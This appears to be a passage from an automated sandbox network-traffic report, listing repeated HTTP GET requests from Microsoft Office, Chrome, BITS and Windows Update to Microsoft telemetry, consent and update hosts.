Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5VeGEGoNDS2WapR&MD=4dYcZxFY HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
